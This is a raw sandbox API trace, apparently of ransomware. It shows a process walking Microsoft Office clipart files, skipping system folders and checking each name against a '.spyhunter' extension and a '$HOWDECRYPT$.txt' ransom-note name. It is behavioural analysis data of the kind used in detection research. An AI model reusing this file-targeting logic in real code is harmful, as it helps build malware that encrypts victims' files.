0x2c0000 [0096.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358fd0 [0096.809] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1548) returned 0x2c310e0 [0096.810] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.810] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="Windows") returned -1 [0096.810] lstrlenW (lpString="Windows") returned 7 [0096.810] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="$Recycle.bin") returned 1 [0096.810] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.810] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="System Volume Information") returned -1 [0096.810] lstrlenW (lpString="System Volume Information") returned 25 [0096.810] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 67 [0096.810] StrStrIW (lpFirst="AG00142_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.810] lstrcmpW (lpString1="AG00142_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.810] lstrcmpW (lpString1="AG00142_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 67 [0096.810] GetProcessHeap () returned 0x2c0000 [0096.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358f00 [0096.810] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0096.810] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.810] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="Windows") returned -1 [0096.810] lstrlenW (lpString="Windows") returned 7 [0096.810] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="$Recycle.bin") returned 1 [0096.810] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.810] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="System Volume Information") returned -1 [0096.810] lstrlenW (lpString="System Volume Information") returned 25 [0096.810] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 67 [0096.810] StrStrIW (lpFirst="AG00154_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.811] lstrcmpW (lpString1="AG00154_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.811] lstrcmpW (lpString1="AG00154_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.811] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 67 [0096.811] GetProcessHeap () returned 0x2c0000 [0096.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359170 [0096.811] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0096.811] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.811] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="Windows") returned -1 [0096.811] lstrlenW (lpString="Windows") returned 7 [0096.811] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="$Recycle.bin") returned 1 [0096.811] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.811] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="System Volume Information") returned -1 [0096.811] lstrlenW (lpString="System Volume Information") returned 25 [0096.811] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 67 [0096.811] StrStrIW (lpFirst="AG00157_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.811] lstrcmpW (lpString1="AG00157_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.811] lstrcmpW (lpString1="AG00157_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.811] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 67 [0096.811] GetProcessHeap () returned 0x2c0000 [0096.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359310 [0096.811] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0096.811] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.811] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="Windows") returned -1 [0096.812] lstrlenW (lpString="Windows") returned 7 [0096.812] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="$Recycle.bin") returned 1 [0096.812] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.812] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="System Volume Information") returned -1 [0096.812] lstrlenW (lpString="System Volume Information") returned 25 [0096.812] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 67 [0096.812] StrStrIW (lpFirst="AG00158_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.812] lstrcmpW (lpString1="AG00158_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.812] lstrcmpW (lpString1="AG00158_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.812] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 67 [0096.895] GetProcessHeap () returned 0x2c0000 [0096.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359240 [0096.895] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0096.895] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.895] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="Windows") returned -1 [0096.895] lstrlenW (lpString="Windows") returned 7 [0096.895] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="$Recycle.bin") returned 1 [0096.895] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.895] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="System Volume Information") returned -1 [0096.895] lstrlenW (lpString="System Volume Information") returned 25 [0096.895] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 67 [0096.896] StrStrIW (lpFirst="AG00160_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.896] lstrcmpW (lpString1="AG00160_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.896] lstrcmpW (lpString1="AG00160_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.896] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 67 [0096.896] GetProcessHeap () returned 0x2c0000 [0096.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3593e0 [0096.896] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0096.896] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.896] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="Windows") returned -1 [0096.896] lstrlenW (lpString="Windows") returned 7 [0096.896] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="$Recycle.bin") returned 1 [0096.896] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.896] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="System Volume Information") returned -1 [0096.896] lstrlenW (lpString="System Volume Information") returned 25 [0096.896] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 67 [0096.896] StrStrIW (lpFirst="AG00161_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.896] lstrcmpW (lpString1="AG00161_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.896] lstrcmpW (lpString1="AG00161_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.896] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 67 [0096.896] GetProcessHeap () returned 0x2c0000 [0096.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3594b0 [0096.896] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0096.896] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.896] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="Windows") returned -1 [0096.896] lstrlenW (lpString="Windows") returned 7 [0096.896] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="$Recycle.bin") returned 1 [0096.896] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.896] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="System Volume Information") returned -1 [0096.896] lstrlenW (lpString="System Volume Information") returned 25 [0096.896] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 67 [0096.897] StrStrIW (lpFirst="AG00163_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.897] lstrcmpW (lpString1="AG00163_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.897] lstrcmpW (lpString1="AG00163_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.897] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 67 [0096.897] GetProcessHeap () returned 0x2c0000 [0096.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359580 [0096.897] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0096.897] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.897] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="Windows") returned -1 [0096.897] lstrlenW (lpString="Windows") returned 7 [0096.897] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="$Recycle.bin") returned 1 [0096.897] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.897] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="System Volume Information") returned -1 [0096.897] lstrlenW (lpString="System Volume Information") returned 25 [0096.897] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 67 [0096.897] StrStrIW (lpFirst="AG00164_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.897] lstrcmpW (lpString1="AG00164_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.897] lstrcmpW (lpString1="AG00164_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.897] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 67 [0096.897] GetProcessHeap () returned 0x2c0000 [0096.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359650 [0096.897] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0096.897] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.897] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="Windows") returned -1 [0096.897] lstrlenW (lpString="Windows") returned 7 [0096.897] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="$Recycle.bin") returned 1 [0096.897] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.897] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="System Volume Information") returned -1 [0096.897] lstrlenW (lpString="System Volume Information") returned 25 [0096.897] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 67 [0096.898] StrStrIW (lpFirst="AG00165_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.898] lstrcmpW (lpString1="AG00165_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.898] lstrcmpW (lpString1="AG00165_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.898] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 67 [0096.898] GetProcessHeap () returned 0x2c0000 [0096.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359720 [0096.898] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0096.898] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.898] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="Windows") returned -1 [0096.898] lstrlenW (lpString="Windows") returned 7 [0096.898] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="$Recycle.bin") returned 1 [0096.898] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.898] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="System Volume Information") returned -1 [0096.898] lstrlenW (lpString="System Volume Information") returned 25 [0096.898] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 67 [0096.898] StrStrIW (lpFirst="AG00167_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.898] lstrcmpW (lpString1="AG00167_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.898] lstrcmpW (lpString1="AG00167_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.898] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 67 [0096.898] GetProcessHeap () returned 0x2c0000 [0096.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3597f0 [0096.898] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0096.898] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.898] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="Windows") returned -1 [0096.898] lstrlenW (lpString="Windows") returned 7 [0096.898] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="$Recycle.bin") returned 1 [0096.898] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.898] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="System Volume Information") returned -1 [0096.898] lstrlenW (lpString="System Volume Information") returned 25 [0096.898] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 67 [0096.898] StrStrIW (lpFirst="AG00169_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.899] lstrcmpW (lpString1="AG00169_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.899] lstrcmpW (lpString1="AG00169_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.899] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 67 [0096.899] GetProcessHeap () returned 0x2c0000 [0096.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3598c0 [0096.899] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0096.899] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.899] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="Windows") returned -1 [0096.899] lstrlenW (lpString="Windows") returned 7 [0096.899] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="$Recycle.bin") returned 1 [0096.899] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.899] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="System Volume Information") returned -1 [0096.899] lstrlenW (lpString="System Volume Information") returned 25 [0096.899] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 67 [0096.899] StrStrIW (lpFirst="AG00170_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.899] lstrcmpW (lpString1="AG00170_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.899] lstrcmpW (lpString1="AG00170_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.899] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 67 [0096.899] GetProcessHeap () returned 0x2c0000 [0096.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359990 [0096.899] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0096.899] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.899] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="Windows") returned -1 [0096.899] lstrlenW (lpString="Windows") returned 7 [0096.899] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="$Recycle.bin") returned 1 [0096.899] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.899] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="System Volume Information") returned -1 [0096.899] lstrlenW (lpString="System Volume Information") returned 25 [0096.899] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 67 [0096.899] StrStrIW (lpFirst="AG00171_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.900] lstrcmpW (lpString1="AG00171_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.900] lstrcmpW (lpString1="AG00171_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.900] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 67 [0096.900] GetProcessHeap () returned 0x2c0000 [0096.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359a60 [0096.900] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0096.900] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.900] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="Windows") returned -1 [0096.900] lstrlenW (lpString="Windows") returned 7 [0096.900] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="$Recycle.bin") returned 1 [0096.900] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.900] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="System Volume Information") returned -1 [0096.900] lstrlenW (lpString="System Volume Information") returned 25 [0096.900] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 67 [0096.900] StrStrIW (lpFirst="AG00172_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.900] lstrcmpW (lpString1="AG00172_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.900] lstrcmpW (lpString1="AG00172_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.900] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 67 [0096.900] GetProcessHeap () returned 0x2c0000 [0096.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359b30 [0096.900] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0096.900] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.900] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="Windows") returned -1 [0096.900] lstrlenW (lpString="Windows") returned 7 [0096.900] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="$Recycle.bin") returned 1 [0096.900] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.900] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="System Volume Information") returned -1 [0096.900] lstrlenW (lpString="System Volume Information") returned 25 [0096.900] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 67 [0096.900] StrStrIW (lpFirst="AG00174_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.901] lstrcmpW (lpString1="AG00174_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.901] lstrcmpW (lpString1="AG00174_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.901] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 67 [0096.901] GetProcessHeap () returned 0x2c0000 [0096.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359c00 [0096.901] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b0) returned 0x2c310e0 [0096.901] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.901] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="Windows") returned -1 [0096.901] lstrlenW (lpString="Windows") returned 7 [0096.901] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="$Recycle.bin") returned 1 [0096.901] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.901] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="System Volume Information") returned -1 [0096.901] lstrlenW (lpString="System Volume Information") returned 25 [0096.901] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 67 [0096.901] StrStrIW (lpFirst="AG00175_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.901] lstrcmpW (lpString1="AG00175_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.901] lstrcmpW (lpString1="AG00175_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.901] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 67 [0096.901] GetProcessHeap () returned 0x2c0000 [0096.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359cd0 [0096.901] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0096.901] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.935] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="Windows") returned -1 [0096.935] lstrlenW (lpString="Windows") returned 7 [0096.935] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="$Recycle.bin") returned 1 [0096.935] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.935] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="System Volume Information") returned -1 [0096.935] lstrlenW (lpString="System Volume Information") returned 25 [0096.935] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 67 [0096.935] StrStrIW (lpFirst="AG00176_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.935] lstrcmpW (lpString1="AG00176_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.935] lstrcmpW (lpString1="AG00176_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.935] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 67 [0096.935] GetProcessHeap () returned 0x2c0000 [0096.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359da0 [0096.936] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0096.936] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.936] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="Windows") returned -1 [0096.936] lstrlenW (lpString="Windows") returned 7 [0096.936] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="$Recycle.bin") returned 1 [0096.936] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.936] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="System Volume Information") returned -1 [0096.936] lstrlenW (lpString="System Volume Information") returned 25 [0096.936] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 67 [0096.936] StrStrIW (lpFirst="AN00010_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.936] lstrcmpW (lpString1="AN00010_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.936] lstrcmpW (lpString1="AN00010_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.936] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 67 [0096.936] GetProcessHeap () returned 0x2c0000 [0096.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359e70 [0096.936] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c0) returned 0x2c310e0 [0096.936] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.936] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="Windows") returned -1 [0096.936] lstrlenW (lpString="Windows") returned 7 [0096.936] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="$Recycle.bin") returned 1 [0096.936] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.936] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="System Volume Information") returned -1 [0096.936] lstrlenW (lpString="System Volume Information") returned 25 [0096.937] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 67 [0096.937] StrStrIW (lpFirst="AN00015_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.937] lstrcmpW (lpString1="AN00015_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.937] lstrcmpW (lpString1="AN00015_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.937] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 67 [0096.937] GetProcessHeap () returned 0x2c0000 [0096.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359f40 [0096.937] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c8) returned 0x2c310e0 [0096.937] FindNextFileW (in: hFindFile=0x335f60, 